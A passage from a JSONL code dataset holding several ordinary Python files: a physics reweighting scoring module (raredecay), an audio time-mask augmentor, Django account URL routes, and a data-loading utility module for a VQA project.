data[i]['img'][j]\n img_neu = data[i]['img_neu'][j]\n diff = img - img_neu\n diff = FFT.dctn(diff)\n '''\n label = int(data[i]['labels'][j])\n if label == 7:\n label = 2\n\n #label = dense_to_one_hot(label, 6)\n\n x1.append(lms)\n yl.append(label)\n\n total_x1.append(x1)\n total_y.append(yl)\n\n return total_x1, total_y\n","repo_name":"chency820/face_patch_mnn","sub_path":"PreProcessing_lms.py","file_name":"PreProcessing_lms.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28895542917","text":"# Python 2 backwards compatibility overhead START\n\"\"\"\nDEPRECEATED! USE OTHER MODULES LIKE rd.data, rd.ml, rd.reweight, rd.score and rd.stat\n\nDEPRECEATED!DEPRECEATED!DEPRECEATED!DEPRECEATED!DEPRECEATED!\n\n\"\"\"\n\n\nimport math as mt\n\nimport numpy as np\n\nfrom . import data_storage, dev_tool\n\n\ndef mayou_score(\n mc_data, real_data, features=None, old_mc_weights=1, clf=\"xgb\", splits=2, n_folds=10\n):\n \"\"\"An experimental score using a \"loss\" function for data-similarity\"\"\"\n import raredecay.analysis.ml_analysis as ml_ana\n from raredecay.globals_ import out\n\n features = dev_tool.entries_to_str(features)\n clf = dev_tool.entries_to_str(clf)\n\n # initialize variables\n output = {}\n score_mc_vs_mcr = []\n score_mcr_vs_real = []\n # splits *= 2 # because every split is done with fold 0 and 1 (<- 2 *)\n\n # loop over number of splits, split the mc data\n\n mc_data.make_folds(n_folds)\n real_data.make_folds(n_folds)\n\n # mc reweighted vs mc\n for fold in range(n_folds):\n mc_data_train, mc_data_test = mc_data.get_fold(fold)\n # TODO: no real folds? It is better to test on full data always?\n # mc_data_train, mc_data_test = real_data.get_fold(fold)\n for split in range(splits * 2): # because two possibilities per split\n if split % 2 == 0:\n mc_data_train.make_folds(2)\n mc_normal, mc_reweighted = mc_data_train.get_fold(split % 2)\n mc_normal.set_weights(old_mc_weights)\n score_mc_vs_mcr.append(\n ml_ana.classify(\n original_data=mc_normal,\n target_data=mc_reweighted,\n features=features,\n validation=[mc_data_test, real_data],\n clf=clf,\n plot_importance=1,\n # TODO: no weights ratio? (roc auc)\n weights_ratio=0,\n )[1]\n )\n out.add_output(\n [\n \"mayou_score mc vs mc reweighted test on mc vs real score: \",\n score_mc_vs_mcr,\n \"\\nMean: \",\n np.mean(score_mc_vs_mcr),\n \" +-\",\n np.std(score_mc_vs_mcr) / mt.sqrt(len(score_mc_vs_mcr) - 1),\n ],\n subtitle=\"Mayou score\",\n to_end=True,\n )\n\n output[\"mc_distance\"] = np.mean(score_mc_vs_mcr)\n\n # mc_reweighted vs real\n for fold in range(n_folds):\n real_train, real_test = real_data.get_fold(fold)\n mc_train, mc_test = mc_data.get_fold(fold)\n mc_test.set_weights(old_mc_weights)\n score_mcr_vs_real.append(\n ml_ana.classify(\n original_data=mc_train,\n target_data=real_train,\n features=features,\n validation=[mc_test, real_test],\n clf=clf,\n plot_importance=1,\n # TODO: no weights ratio? (roc auc)\n weights_ratio=0,\n )[1]\n )\n\n out.add_output(\n [\n \"mayou_score real vs mc reweighted test on mc vs real score: \",\n score_mcr_vs_real,\n \"\\nMean: \",\n np.mean(score_mcr_vs_real),\n \" +-\",\n np.std(score_mcr_vs_real) / mt.sqrt(len(score_mcr_vs_real) - 1),\n ],\n to_end=True,\n )\n\n output[\"real_distance\"] = np.mean(score_mcr_vs_real)\n\n\ndef train_similar(\n mc_data,\n real_data,\n features=None,\n n_checks=10,\n n_folds=10,\n clf=\"xgb\",\n test_max=True,\n test_shuffle=True,\n test_mc=False,\n old_mc_weights=1,\n test_predictions=False,\n clf_pred=\"rdf\",\n):\n \"\"\"Score for reweighting. Train clf on mc reweighted/real, test on real; minimize score.\n\n Enter two datasets and evaluate the score described below. Return a\n dictionary containing the different scores. The test_predictions is\n another scoring, which is built upon the train_similar method.\n\n **Scoring method description**\n\n **Idea**:\n A clf is trained on the reweighted mc as well as on the real data of a\n certain decay. Therefore, the classifier learns to distinguish between\n Monte-Carlo data and real data. Then we let the classifier predict some\n real data (an unbiased test set) and see, how many he is able to classify\n as real events. The lower the score, the less differences he was able to\n learn from the train data therefore the more similar the train data\n therefore the better the reweighting.\n\n **Advandages**: It is quite difficult to cheat on this method. Most of all\n it is robust to single high-weight events (which mcreweighted_as_real is\n not) and, in general, seems to be the best scoring so far.\n\n **Disadvantages**: If you insert a gaussian shaped 1.0 as mc and a gaussian\n shaped 1.1 as real, the score will be badly (around 0.33). So far, this was\n only observed for \"artificial\" distributions (even dough, of course, we\n do not know if it affects real distributions aswell partly)\n\n **Output explanation**\n\n The return is a dictionary containing several values. Of course, only the\n values, which are set to be evaluated, are contained. The keys are:\n\n - '**score**' : The average of all train_similar scores (as we use KFolding,\n there will be n_folds scores). *The* score.\n - '**score_std**' : The std of a single score, just for curiosity\n - '**score_max**' : The (average of all) \"maximum\" score. Actually the\n train_similar score but\n with mc instead of *reweighted* mc. Should be higher then the\n reweighted score.\n - '**score_max_std**' : The std of a single score, just for curiosity\n - '**score_pred**' : The score of the test_predictions method.\n - '**score_mc_pred**' : The score of the test_predictions method but on the\n predictions of the mc instead of the *reweighted* mc.\n\n Parameters\n ----------\n mc_data : |hepds_type|\n The reweighted Monte-Carlo data, assuming the new weights are applied\n already.\n real_data : |hepds_type|\n The real data\n n_checks : int >= 1\n Number of checks to perform. Has to be <= n_folds\n n_folds : int > 1\n Number of folds the data will be split into\n clf : str\n The name of a classifier to be used in\n :py:func:`~raredecay.analysis.ml_analysis.classify`.\n test_max : boolean\n If true, test for the \"maximum value\" by training also on mc/real\n (instead of *reweighted* mc/real)\n and test on real. The score for only mc should be higher than for\n reweighted mc/real. It *should* most probably but does not have to\n be!\n old_mc_weights : array-like or 1\n If *test_max* is True, the weights for mc before reweighting will be\n taken to be *old_mc_weights*, the weights the mc distribution had\n before the reweighting. The default is 1.\n test_predictions : boolean\n If true, try to distinguish the predictions. Advanced feature and not\n yet really discoverd how to interpret. Gives very high ROC somehow.\n clf_pred : str\n The classifier to be used to distinguish the predictions. Required for\n the *test_predictions*.\n\n Return\n ------\n out : dict\n A dictionary conaining the different scores. Description see above.\n\n \"\"\"\n import raredecay.analysis.ml_analysis as ml_ana\n from raredecay.globals_ import out\n\n features = dev_tool.entries_to_str(features)\n clf = dev_tool.entries_to_str(clf)\n clf_pred = dev_tool.entries_to_str(clf_pred)\n\n # initialize variables\n assert (\n 1 <= n_checks <= n_folds and n_folds > 1\n ), \"wrong n_checks/n_folds. Check the docs\"\n assert isinstance(mc_data, data_storage.HEPDataStorage), (\n \"mc_data wrong type:\" + str(type(mc_data)) + \", has to be HEPDataStorage\"\n )\n assert isinstance(real_data, data_storage.HEPDataStorage), (\n \"real_data wrong type:\" + str(type(real_data)) + \", has to be HEPDataStorage\"\n )\n # assert isinstance(clf, str),\\\n # \"clf has to be a string, the name of a valid classifier. Check the docs!\"\n\n output = {}\n\n scores = np.ones(n_checks)\n scores_shuffled = np.ones(n_checks)\n scores_mc = np.ones(n_checks)\n scores_max = np.ones(n_checks) # required due to output of loop\n scores_mc_max = np.ones(n_checks)\n # scores_weighted = []\n scores_max_weighted = []\n probas_mc = []\n probas_reweighted = []\n weights_mc = []\n weights_reweighted = []\n\n real_pred = []\n real_test_index = []\n real_mc_pred = []\n\n # initialize data\n tmp_mc_targets = mc_data.get_targets()\n mc_data.set_targets(0)\n real_data.make_folds(n_folds=n_folds)\n if test_mc:\n mc_data.make_folds(n_folds=n_folds)\n for fold in range(n_checks):\n real_train, real_test = real_data.get_fold(fold)\n if test_mc:\n mc_train, mc_test = mc_data.get_fold(fold)\n mc_test.set_targets(0)\n else:\n mc_train = mc_data.copy_storage()\n mc_train.set_targets(0)\n\n real_test.set_targets(1)\n real_train.set_targets(1)\n\n tmp_out = ml_ana.classify(\n mc_train,\n real_train,\n validation=real_test,\n clf=clf,\n plot_title=\"train on mc reweighted/real, test on real\",\n weights_ratio=1,\n get_predictions=True,\n features=features,\n plot_importance=1,\n importance=1,\n )\n clf_trained, scores[fold], pred_reweighted = tmp_out\n\n tmp_weights = mc_train.get_weights()\n\n if test_shuffle:\n import copy\n\n shuffled_weights = copy.deepcopy(tmp_weights)\n shuffled_weights.reindex(np.random.permutation(shuffled_weights.index))\n mc_train.set_weights(shuffled_weights)\n tmp_out = ml_ana.classify(\n mc_train,\n real_train,\n validation=real_test,\n clf=clf,\n plot_title=\"train on mc reweighted/real, test on real\",\n weights_ratio=1,\n get_predictions=True,\n features=features,\n plot_importance=1,\n importance=1,\n )\n scores_shuffled[fold] = tmp_out[1]\n mc_train.set_weights(tmp_weights)\n\n if test_mc:\n clf_trained, scores_mc[fold] = ml_ana.classify(\n validation=mc_test,\n clf=clf_trained,\n plot_title=\"train on mc reweighted/real, test on mc\",\n weights_ratio=1,\n get_predictions=False,\n features=features,\n plot_importance=1,\n importance=1,\n )\n\n # del clf_trained, tmp_pred\n probas_reweighted.append(pred_reweighted[\"y_proba\"])\n weights_reweighted.append(pred_reweighted[\"weights\"])\n\n real_pred.extend(pred_reweighted[\"y_pred\"])\n real_test_index.extend(real_test.get_index())\n\n if test_max:\n temp_weights = mc_data.get_weights()\n mc_data.set_weights(old_mc_weights)\n tmp_out = ml_ana.classify(\n mc_data,\n real_train,\n validation=real_test,\n plot_title=\"real/mc NOT reweight trained, validate on real\",\n weights_ratio=1,\n get_predictions=True,\n clf=clf,\n features=features,\n plot_importance=1,\n importance=1,\n )\n clf_trained, scores_max[fold], pred_mc = tmp_out\n if test_mc:\n clf_trained, scores_mc_max[fold] = ml_ana.classify(\n validation=mc_test,\n clf=clf_trained,\n plot_title=\"train on mc NOT reweighted/real, test on mc\",\n weights_ratio=1,\n get_predictions=False,\n features=features,\n plot_importance=1,\n importance=1,\n )\n del clf_trained\n # HACK\n tmp_pred = pred_mc[\"y_proba\"][:, 1] * pred_mc[\"weights\"]\n scores_max_weighted.extend(tmp_pred * (pred_mc[\"y_true\"] * 2 - 1))\n\n # HACK END\n mc_data.set_weights(temp_weights)\n probas_mc.append(pred_mc[\"y_proba\"])\n weights_mc.append(pred_mc[\"weights\"])\n\n real_mc_pred.extend(pred_mc[\"y_pred\"])\n\n output[\"score\"] = np.round(scores.mean(), 4)\n output[\"score_std\"] = np.round(scores.std(), 4)\n\n if test_shuffle:\n output[\"score_shuffled\"] = np.round(scores_shuffled.mean(), 4)\n output[\"score_shuffled_std\"] = np.round(scores_shuffled.std(), 4)\n\n if test_mc:\n output[\"score_mc\"] = np.round(scores_mc.mean(), 4)\n output[\"score_mc_std\"] = np.round(scores_mc.std(), 4)\n\n out.add_output(\n [\n \"Score train_similar (recall, lower means better): \",\n str(output[\"score\"]) + \" +- \" + str(output[\"score_std\"]),\n ],\n subtitle=\"Clf trained on real/mc reweight, tested on real\",\n )\n if test_max:\n output[\"score_max\"] = np.round(scores_max.mean(), 4)\n output[\"score_max_std\"] = np.round(scores_max.std(), 4)\n if test_mc:\n output[\"score_mc_max\"] = np.round(scores_mc_max.mean(), 4)\n output[\"score_mc_max_std\"] = np.round(scores_mc_max.std(), 4)\n out.add_output([\"No reweighting score: \", round(output[\"score_max\"], 4)])\n\n if test_predictions:\n # test on the reweighted/real predictions\n real_data.set_targets(targets=real_pred, index=real_test_index)\n tmp_, score_pred = ml_ana.classify(\n real_data,\n target_from_data=True,\n clf=clf_pred,\n features=features,\n plot_title=\"train on predictions reweighted/real, real as target\",\n weights_ratio=1,\n validation=n_checks,\n plot_importance=3,\n )\n output[\"score_pred\"] = round(score_pred, 4)\n\n if test_predictions and test_max:\n # test on the mc/real predictions\n real_data.set_targets(targets=real_mc_pred, index=real_test_index)\n tmp_, score_mc_pred = ml_ana.classify(\n real_data,\n target_from_data=True,\n clf=clf_pred,\n validation=n_checks,\n plot_title=\"mc not rew/real pred, real as target\",\n weights_ratio=1,\n plot_importance=3,\n )\n output[\"score_mc_pred\"] = np.round(score_mc_pred, 4)\n\n mc_data.set_targets(tmp_mc_targets)\n\n output[\"similar_dist\"] = similar_dist(\n predictions=np.concatenate(probas_reweighted)[:, 1],\n weights=np.concatenate(weights_reweighted),\n )\n\n return output\n\n\ndef estimate_weights_bias(mc, real, columns=None, n_folds=10, clf=\"xgb\"):\n pass\n\n\ndef train_similar_new(\n mc,\n real,\n columns=None,\n n_checks=10,\n n_folds=10,\n clf=\"xgb\",\n test_max=True,\n test_shuffle=True,\n test_mc=False,\n old_mc_weights=1,\n test_predictions=False,\n clf_pred=\"rdf\",\n):\n \"\"\"Score for reweighting. Train clf on mc reweighted/real, test on real; minimize score.\n\n Enter two datasets and evaluate the score described below. Return a\n dictionary containing the different scores. The test_predictions is\n another scoring, which is built upon the train_similar method.\n\n **Scoring method description**\n\n **Idea**:\n A clf is trained on the reweighted mc as well as on the real data of a\n certain decay. Therefore, the classifier learns to distinguish between\n Monte-Carlo data and real data. Then we let the classifier predict some\n real data (an unbiased test set) and see, how many he is able to classify\n as real events. The lower the score, the less differences he was able to\n learn from the train data therefore the more similar the train data\n therefore the better the reweighting.\n\n **Advandages**: It is quite difficult to cheat on this method. Most of all\n it is robust to single high-weight events (which mcreweighted_as_real is\n not) and, in general, seems to be the best scoring so far.\n\n **Disadvantages**: If you insert a gaussian shaped 1.0 as mc and a gaussian\n shaped 1.1 as real, the score will be badly (around 0.33). So far, this was\n only observed for \"artificial\" distributions (even dough, of course, we\n do not know if it affects real distributions aswell partly)\n\n **Output explanation**\n\n The return is a dictionary containing several values. Of course, only the\n values, which are set to be evaluated, are contained. The keys are:\n\n - '**score**' : The average of all train_similar scores (as we use KFolding,\n there will be n_folds scores). *The* score.\n - '**score_std**' : The std of a single score, just for curiosity\n - '**score_max**' : The (average of all) \"maximum\" score. Actually the\n train_similar score but\n with mc instead of *reweighted* mc. Should be higher then the\n reweighted score.\n - '**score_max_std**' : The std of a single score, just for curiosity\n - '**score_pred**' : The score of the test_predictions method.\n - '**score_mc_pred**' : The score of the test_predictions method but on the\n predictions of the mc instead of the *reweighted* mc.\n\n Parameters\n ----------\n mc : |hepds_type|\n The reweighted Monte-Carlo data, assuming the new weights are applied\n already.\n real : |hepds_type|\n The real data\n n_checks : int >= 1\n Number of checks to perform. Has to be <= n_folds\n n_folds : int > 1\n Number of folds the data will be split into\n clf : str\n The name of a classifier to be used in\n :py:func:`~raredecay.analysis.ml_analysis.classify`.\n test_max : boolean\n If true, test for the \"maximum value\" by training also on mc/real\n (instead of *reweighted* mc/real)\n and test on real. The score for only mc should be higher than for\n reweighted mc/real. It *should* most probably but does not have to\n be!\n old_mc_weights : array-like or 1\n If *test_max* is True, the weights for mc before reweighting will be\n taken to be *old_mc_weights*, the weights the mc distribution had\n before the reweighting. The default is 1.\n test_predictions : boolean\n If true, try to distinguish the predictions. Advanced feature and not\n yet really discoverd how to interpret. Gives very high ROC somehow.\n clf_pred : str\n The classifier to be used to distinguish the predictions. Required for\n the *test_predictions*.\n\n Return\n ------\n out : dict\n A dictionary conaining the different scores. Description see above.\n\n \"\"\"\n import raredecay.analysis.ml_analysis as ml_ana\n from raredecay.analysis import statistics\n from raredecay.tools.data_storage import HEPDataStorage\n\n # Python 2/3 compatibility, str\n columns = dev_tool.entries_to_str(columns)\n clf = dev_tool.entries_to_str(clf)\n clf_pred = dev_tool.entries_to_str(clf_pred)\n\n # initialize variables\n assert (\n 1 <= n_checks <= n_folds and n_folds > 1\n ), \"wrong n_checks/n_folds. Check the docs\"\n assert isinstance(mc, data_storage.HEPDataStorage), (\n \"mc_data wrong type:\" + str(type(mc)) + \", has to be HEPDataStorage\"\n )\n assert isinstance(real, data_storage.HEPDataStorage), (\n \"real_data wrong type:\" + str(type(real)) + \", has to be HEPDataStorage\"\n )\n # assert isinstance(clf, str),\\\n # \"clf has to be a string, the name of a valid classifier. Check the docs!\"\n\n output = {}\n\n predictions = []\n predictions_weights = []\n predictions_max = []\n predictions_max_weights = []\n predictions_min = []\n predictions_min_weights = []\n\n # initialize data\n tmp_mc_targets = mc.get_targets()\n mc.set_targets(0)\n real.make_folds(n_folds=n_folds)\n\n for fold in range(n_checks):\n real_train, real_test = real.get_fold(fold)\n mc_train = mc.copy_storage()\n mc_train.set_targets(0)\n real_test.set_targets(1)\n real_train.set_targets(1)\n\n tmp_out = ml_ana.classify(\n mc_train,\n real_train,\n validation=real_test,\n clf=clf,\n plot_title=\"train on mc reweighted/real, test on real\",\n weights_ratio=1,\n get_predictions=True,\n features=columns,\n plot_importance=1,\n importance=1,\n )\n clf_trained, _, pred = tmp_out\n\n predictions.append(pred[\"y_proba\"][:, 1])\n predictions_weights.append(pred[\"weights\"])\n\n temp_weights = mc_train.weights\n mc_train.set_weights(old_mc_weights)\n tmp_out = ml_ana.classify(\n original_data=mc_train,\n target_data=real_train,\n validation=real_test,\n plot_title=\"real/mc NOT reweight trained, validate on real\",\n weights_ratio=1,\n get_predictions=True,\n clf=clf,\n features=columns,\n plot_importance=1,\n importance=1,\n )\n clf_trained, _, pred = tmp_out\n predictions_max.append(pred[\"y_proba\"][:, 1])\n predictions_max_weights.append(pred[\"weights\"])\n mc_train.set_weights(temp_weights)\n\n predictions = np.concatenate(predictions)\n predictions_weights = np.concatenate(predictions_weights)\n predictions_max = np.concatenate(predictions_max)\n predictions_max_weights = np.concatenate(predictions_max_weights)\n\n # mix mc and real to get a nice shape of two similar dists\n # TODO: commented below out\n mc.set_weights(old_mc_weights)\n mc.make_folds(2)\n real.make_folds(2)\n mc1, mc2 = mc.get_fold(0)\n real1, real2 = real.get_fold(0)\n\n data1, target1, weights1 = mc1.make_dataset(real1)\n data2, target2, weights2 = mc2.make_dataset(real2)\n\n data1 = HEPDataStorage(data=data1, sample_weights=weights1, target=0)\n data2 = HEPDataStorage(data=data2, sample_weights=weights2, target=1)\n\n tmp_out = ml_ana.classify(\n original_data=data1,\n target_data=data2,\n validation=n_folds,\n plot_title=\"real/mc mixed\",\n weights_ratio=1,\n get_predictions=True,\n clf=clf,\n features=columns,\n plot_importance=1,\n importance=1,\n )\n clf_trained, _, pred = tmp_out\n predictions_min = np.array(pred[\"y_proba\"][:, 1])\n predictions_min_weights = np.array(pred[\"weights\"])\n\n mc.set_weights(temp_weights)\n mc.set_targets(tmp_mc_targets)\n\n # HACK\n import matplotlib.pyplot as plt\n\n n_bins = 20\n plt.figure(\"comparing the predictions\")\n plt.hist(predictions, alpha=0.3, label=\"predictions\", bins=n_bins, density=1)\n plt.hist(\n predictions_min, alpha=0.3, label=\"predictions_min\", bins=n_bins, density=1\n )\n plt.hist(\n predictions_max, alpha=0.3, label=\"predictions_max\", bins=n_bins, density=1\n )\n plt.legend()\n # plt.autoscale()\n\n output[\"similar_ks_minimize\"] = statistics.ks_2samp(\n predictions,\n predictions_min,\n weights1=predictions_weights,\n weights2=predictions_min_weights,\n )\n output[\"similar_ks_max\"] = statistics.ks_2samp(\n predictions_max,\n predictions_min,\n weights1=predictions_max_weights,\n weights2=predictions_min_weights,\n )\n output[\"similar_ks_maximize\"] = statistics.ks_2samp(\n predictions,\n predictions_max,\n weights1=predictions_weights,\n weights2=predictions_max_weights,\n )\n\n return output\n\n\ndef similar_dist(predictions, weights=None, true_y=1, threshold=0.5):\n \"\"\"Metric to evaluate the predictions on one label only for similarity test.\n\n This metric is used inside the mayou_score\n\n Parameters\n ----------\n predictions : :py:class:`~np.array`\n The predicitons\n weights : array-like\n The weights for the predictions\n true_y : {0 , 1}\n The \"true\" label of the data\n threshold : float\n The threshold for the predictions to decide whether a point belongs\n to 0 or 1.\n \"\"\"\n # HACK\n scale = 2 # otherwise, the predictions will be [-0.5, 0.5]\n # HACK END\n data_valid = min(predictions) < threshold < max(predictions)\n if not data_valid:\n raise ValueError(\"Predictions are all above or below the threshold\")\n\n if true_y == 0:\n predictions = 1 - predictions\n\n predictions -= threshold\n predictions *= scale\n true_pred = predictions[predictions > 0]\n false_pred = predictions[predictions <= 0] * -1\n\n true_weights = false_weights = 1\n\n if not dev_tool.is_in_primitive(weights, None):\n true_weights = weights[predictions > 0]\n false_weights = weights[predictions <= 0]\n score = sum(\n ((np.exp(1.3 * np.square(true_pred + 0.6)) - 1.5969) * 0.5) * true_weights\n )\n score -= sum(\n ((np.sqrt(false_pred) - np.power(false_pred, 0.8)) * 2) * false_weights\n )\n score /= sum(weights)\n\n return score\n","repo_name":"jonas-eschle/raredecay","sub_path":"raredecay/tools/ml_scores.py","file_name":"ml_scores.py","file_ext":"py","file_size_in_byte":25126,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"21127013903","text":"import torchaudio.transforms as transforms\r\n\r\nclass TimeMaskAugmentor(object):\r\n def __init__(self, rng, time_T, time_num_mask):\r\n self._tm = transforms.TimeMasking(time_T)\r\n self._time_num_mask = time_num_mask\r\n self._rng = rng\r\n \r\n def transform_audio(self, spec):\r\n for _ in range(self._time_num_mask):\r\n spec = self._tm(spec, spec.mean())\r\n\r\n return spec","repo_name":"Rafa-zy/SENT","sub_path":"ASR/augmentor/specaug/timemaskaug.py","file_name":"timemaskaug.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22010670731","text":"from django.urls import path, include\nfrom . import views\nfrom django.contrib.auth.views import LoginView, LogoutView\n\n\nurlpatterns = [\n path('', views.home),\n path('register/', views.register),\n path('activate//', views.activate_user, name='activate'),\n path('oauth/', include('social_django.urls', namespace='social')),\n path('login/', LoginView.as_view(template_name='account/login.html'), name=\"login\"),\n path('logout/', LogoutView.as_view(template_name='account/logout.html'), name=\"logout\"),\n path('profile/', views.view_profile, name=\"view-profile\"),\n path('follow/', views.follow_view, name='follow-user'),\n path('profile/edit', views.edit_profile, name=\"edit-profile\"),\n path('all/', views.all_users, name=\"all-users\"),\n path('profile//followers', views.profile_followers, name=\"profile-followers\"),\n path('profile//following', views.profile_following, name=\"profile-following\"),\n path('delete/', views.delete_user, name=\"delete-user\"),\n ]","repo_name":"margo-dubovyk/DjangoGram","sub_path":"djangogramm/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8577475265","text":"import os\nimport sys\nimport csv\nimport base64\nimport h5py\nimport pickle\nimport glob\nimport lmdb\n\nimport time\nimport json\nimport errno\nfrom tqdm import tqdm\n\nimport numpy as np\n\nimport torch\n\n\"\"\"\nUtilities for preprocessing sequence data.\n\nSpecial tokens that are in all dictionaries:\n: Extra parts of the sequence that we should ignore\n: Goes at the start of a sequence\n: Goes at the end of a sequence, before tokens\n: Out-of-vocabulary words\n\"\"\"\n\nSPECIAL_TOKENS = {\n '': 0,\n '': 1,\n '': 2,\n '': 3,\n}\n\n\ndef tokenize(s, delim=' ', add_start_token=True, add_end_token=True,\n punct_to_keep=None, punct_to_remove=None):\n \"\"\"\n Tokenize a sequence, converting a string s into a list of (string) tokens by\n splitting on the specified delimiter. Optionally keep or remove certain\n punctuation marks and add start and end tokens.\n \"\"\"\n if punct_to_keep is not None:\n for p in punct_to_keep:\n s = s.replace(p, '%s%s' % (delim, p))\n \n if punct_to_remove is not None:\n for p in punct_to_remove:\n s = s.replace(p, '')\n \n # if delim='' then regard the whole s as a token\n tokens = s.split(delim) if delim else [s]\n if add_start_token:\n tokens.insert(0, '')\n if add_end_token:\n tokens.append('')\n return tokens\n\n\ndef build_vocab(sequences, min_token_count=1, delim=' ', punct_to_keep=None,\n punct_to_remove=None, add_special=None):\n token_to_count = {}\n tokenize_kwargs = {\n 'delim': delim,\n 'punct_to_keep': punct_to_keep,\n 'punct_to_remove': punct_to_remove,\n }\n for seq in sequences:\n seq_tokens = tokenize(seq, **tokenize_kwargs,\n add_start_token=False, add_end_token=False)\n for token in seq_tokens:\n if token not in token_to_count:\n token_to_count[token] = 0\n token_to_count[token] += 1\n \n token_to_idx = {}\n if add_special:\n for token in SPECIAL_TOKENS:\n token_to_idx[token] = len(token_to_idx)\n for token, count in sorted(token_to_count.items()):\n if count >= min_token_count:\n token_to_idx[token] = len(token_to_idx)\n \n return token_to_idx\n\n\ndef encode(seq_tokens, token_to_idx, allow_unk=False):\n seq_idx = []\n for token in seq_tokens:\n if token not in token_to_idx:\n if allow_unk:\n token = ''\n else:\n raise KeyError('Token \"%s\" not in vocab' % token)\n seq_idx.append(token_to_idx[token])\n return seq_idx\n\n\ndef decode(seq_idx, idx_to_token, delim=None, stop_at_end=True):\n tokens = []\n for idx in seq_idx:\n tokens.append(idx_to_token[idx])\n if stop_at_end and tokens[-1] == '':\n break\n if delim is None:\n return tokens\n else:\n return delim.join(tokens)\n\n\ncsv.field_size_limit(sys.maxsize)\nFIELDNAMES = [\"img_id\", \"img_h\", \"img_w\", \"objects_id\", \"objects_conf\",\n \"attrs_id\", \"attrs_conf\", \"num_boxes\", \"boxes\", \"features\"]\n\n\ndef load_obj_tsv(fname, topk=None):\n \"\"\"Load object features from tsv file.\n\n :param fname: The path to the tsv file.\n :param topk: Only load features for top K images (lines) in the tsv file.\n Will load all the features if topk is either -1 or None.\n :return: A list of image object features where each feature is a dict.\n See FILENAMES above for the keys in the feature dict.\n \"\"\"\n data = []\n start_time = time.time()\n print(\"Start to load Faster-RCNN detected objects from %s\" % fname)\n with open(fname) as f:\n reader = csv.DictReader(f, FIELDNAMES, delimiter=\"\\t\")\n for i, item in enumerate(reader):\n \n for key in ['img_h', 'img_w', 'num_boxes']:\n item[key] = int(item[key])\n \n boxes = item['num_boxes']\n decode_config = [\n ('objects_id', (boxes,), np.int64),\n ('objects_conf', (boxes,), np.float32),\n ('attrs_id', (boxes,), np.int64),\n ('attrs_conf', (boxes,), np.float32),\n ('boxes', (boxes, 4), np.float32),\n ('features', (boxes, -1), np.float32),\n ]\n for key, shape, dtype in decode_config:\n item[key] = np.frombuffer(base64.b64decode(item[key]),\n dtype=dtype)\n item[key] = item[key].reshape(shape)\n item[key].setflags(write=False)\n \n data.append(item)\n if topk is not None and len(data) == topk:\n break\n elapsed_time = time.time() - start_time\n print(\"Loaded %d images in file %s in %d seconds.\" % (\n len(data), fname, elapsed_time))\n \n return data\n\n\ndef load_obj_h5(data_root, mode, topk=None):\n start_time = time.time()\n fname = os.path.join(data_root, f'{mode}_obj36.h5')\n finfo = os.path.join(data_root, f'{mode}_obj36_info.json')\n data_info = load_json(finfo)\n data_info_dict = {datum['img_id']: datum\n for datum in data_info}\n print(f\"Start to load Faster-RCNN detected objects from {fname}\")\n data = []\n h5_file = h5py.File(fname, 'r')\n for key in h5_file.keys():\n temp = {'img_id': int(key)}\n for k in ['img_h', 'img_w', 'num_boxes']:\n temp[k] = data_info_dict[int(key)][k]\n for k in ['attrs_conf', 'attrs_id', 'boxes',\n 'features', 'objects_conf', 'objects_id']:\n temp[k] = h5_file[key].get(k)[:]\n data.append(temp)\n if topk is not None and len(data) == topk:\n break\n elapsed_time = time.time() - start_time\n print(\"Loaded %d images in file %s in %d seconds.\" % (\n len(data), fname, elapsed_time))\n \n return data\n\n\ndef create_dir(path):\n if not os.path.exists(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n\ndef save_json(data, file_path):\n with open(file_path, \"w\") as f:\n json.dump(data, f, sort_keys=True, indent=4)\n\n\ndef load_json(file_path):\n with open(file_path, \"r\") as f:\n return json.load(f)\n\n\ndef save_pickle(data, data_path, highest=False):\n protocol = 2 if highest else 0\n with open(data_path, \"wb\") as f:\n pickle.dump(data, f, protocol=protocol)\n\n\ndef load_pickle(pickle_file):\n try:\n with open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f)\n except UnicodeDecodeError as e:\n with open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f, encoding='latin1')\n except Exception as e:\n print('Unable to load data ', pickle_file, ':', e)\n raise\n return pickle_data\n\n\ndef read_txt(file):\n with open(file, \"r\") as f:\n data = [line.strip('\\n') for line in f.readlines()]\n return data\n\n\ndef write_txt(file, s):\n with open(file, 'a+') as f:\n f.write(s)\n\n\ndef invert_dict(d):\n return {v: k for k, v in d.items()}\n\n\ndef todevice(tensor, device):\n if isinstance(tensor, list) or isinstance(tensor, tuple):\n assert isinstance(tensor[0], torch.Tensor)\n return [todevice(t, device) for t in tensor]\n elif isinstance(tensor, torch.Tensor):\n return tensor.to(device)\n\n\ndef convert_lmdb(lmdb_file, features_dir):\n MAP_SIZE = 1099511627776\n infiles = glob.glob(os.path.join(features_dir, \"*\"))\n id_list = []\n \n env = lmdb.open(lmdb_file, map_size=MAP_SIZE)\n with env.begin(write=True) as txn:\n for infile in tqdm(infiles):\n reader = np.load(infile, allow_pickle=True)\n item = {\"image_id\": reader.item().get(\"image_id\")}\n img_id = str(item[\"image_id\"]).encode()\n id_list.append(img_id)\n item[\"image_h\"] = reader.item().get(\"image_height\")\n item[\"image_w\"] = reader.item().get(\"image_width\")\n item[\"num_boxes\"] = reader.item().get(\"num_boxes\")\n item[\"boxes\"] = reader.item().get(\"bbox\")\n item[\"features\"] = reader.item().get(\"features\")\n txn.put(img_id, pickle.dumps(item))\n txn.put(\"keys\".encode(), pickle.dumps(id_list))\n","repo_name":"jingjing12110/CIB-VQA","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22798488337","text":"\"\"\" Module for BudgetModifiedOrDeleted \"\"\"\n\nimport json\n\nfrom reflex_core import AWSRule, subscription_confirmation\n\n\nclass BudgetModifiedOrDeleted(AWSRule):\n 